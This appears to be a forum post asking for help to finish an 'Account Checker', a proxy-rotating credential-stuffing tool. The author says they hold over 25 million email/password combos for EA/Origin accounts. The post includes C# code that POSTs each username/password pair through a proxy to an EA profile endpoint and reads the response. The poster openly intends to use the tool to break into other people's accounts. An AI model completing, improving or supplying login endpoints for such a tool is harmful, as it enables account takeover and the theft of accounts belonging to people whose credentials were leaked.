Account Checker
Currently working on an Account Checker. I have made pretty much the whole program with multi-thread compatibility etc, just stuck on the bit of finding which url to send the email/pass combo to check if its valid/ how to find it in the future. Currently making an Origin/EA Checker. I have around 25mil+ Combos ready to check for EA accounts. Wonderin if anyone can help? My connection code:
Code:
var proxy = new WebProxy(j.Item1, Port: int.Parse(j.Item2));
byte[] data = Encoding.ASCII.GetBytes(
$"username={i.Item1}&password={i.Item2}");
WebRequest request = WebRequest.Create("https://profile.ea.com/");
request.Method = "POST";
request.ContentType = "application/x-www-form-urlencoded";
request.Proxy = proxy;
request.ContentLength = data.Length;
using (Stream stream = request.GetRequestStream())
{
stream.Write(data, 0, data.Length);
}
string responseContent = null;
using (WebResponse response = request.GetResponse())
{
using (Stream stream = response.GetResponseStream())
{
using (StreamReader sr99 = new StreamReader(stream))
{
responseContent = sr99.ReadToEnd();
}
}
}




